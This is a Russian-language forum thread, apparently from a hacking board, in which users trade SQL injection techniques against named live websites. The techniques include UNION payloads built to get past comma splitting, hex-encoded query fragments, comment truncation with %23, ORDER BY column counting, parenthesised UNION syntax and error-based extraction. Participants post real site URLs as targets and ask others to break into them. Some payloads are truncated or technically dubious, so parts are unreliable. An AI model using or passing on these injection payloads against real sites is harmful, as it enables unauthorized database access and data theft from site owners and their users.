проблема такая.... есть уязвимое место в параметре такого вот вида "123,345,678", который парсится в результате получается примерно такой sql ...name FROM users WHERE id != 1 AND (id='123' OR id='345' OR id='678') ... хочу вставить юнион "123') union select 11,22,33 from users where (id='345" в запрос, но не знаю как написать sql без использования запятых, а иначе запрос дробится И вторая проблема в том что не получается использовать символ # что бы закоментировать оставшуюся часть sql. подскажите как сделать
так не получится. Я же писал, что параметр разбивается на части по запятым. и если отправить параметр равный "123') union select 11,22,33 from users where (id='345" то получится такая фигня : name FROM users WHERE id != 1 AND (id='123') union select 11' OR id='22' OR id='33 from users where (id='345') ... т.к. присутствуют запятые и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?
Ааа вот оно что, попробуй значит. 1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c362c372c38 .... %23
Это вроде помогает, хотя еще не понятно. но теперь хотя бы на количество столбцов ругается, а не на синтаксис. Возможно просто считает это одним столбцом. Объясни пожалуйста что это за строка такая, и как её самому собирать. А база похоже PostgreSQL....
http://ctacok.ru/he.php?c=union%20select%201,2,3,4,5,6,7,8 http://ctacok.ru/he.php?c=order%20by%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 Вбиваешь: 0x6f7264657220627920312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c32362c32372c32382c32392c333 Какая ошибка вылезет, отнимаешь один, и вот тебе кол-во столбцов. Ex: если ошибка с числом 25, то колонок 24 Ну ты понел чо дальше делать
вобщем так тоже не прокатывает. База воспринимает эту строку значение одного столбца. Может быть конечно я что то не то делаю... Столбцов там 3, вычислил с помощью order by. (order by 3 - так работает, а так order by 4 уже нет ) Как же мне запятые спрятать?
только скобки попробуй заюзать. Не могу найти статью об этом. Но там что-то типа script.php?id=N(union)(select)(1)(2) Если не прав поправьте вот https://forum.antichat.ru/threadnav125796-2-10.html конкретно, https://forum.antichat.ru/showpost.php?p=1734851&postcount=13
Да да так идёт. Кстате ехал в автобусе вспомнил про вывод через ошибку. Пробуй через вывод ошибок. Правдо каждый раз хексить ...
Выручайте. крутил вертел - этот кубик рубик не собрал http:// dragonar. biz/ news.php?pg=1 Может кто разрулит php или sql - отпишитесь по результатам.
http://dragonar.biz/news.php?pg=-123 Страница(-123):1 http://dragonar.biz/news.php?pg=-23abcd Страница(-23):1 => intval () Да
нет со скобками не получилось. Я так понял union без запятых не сделать. Эта задачка мне не под силу. (((( Спасибо за содействие, но я сдаюсь А что за метод через вывод ошибок? Бегло поискал описание, но не нашел.
http://warcastle.ru/database_miss.php?id=-25 кстати вот еще сайтец. 23 поля раньше было. все канало. а теперь толи прикрыли дыру толи чё, понять немогу.
Ну сам то думай, если ты раньше это смог сделать, сейчас нет? Естественно залатали, или ппробуй потыкай +-10 столбцов.
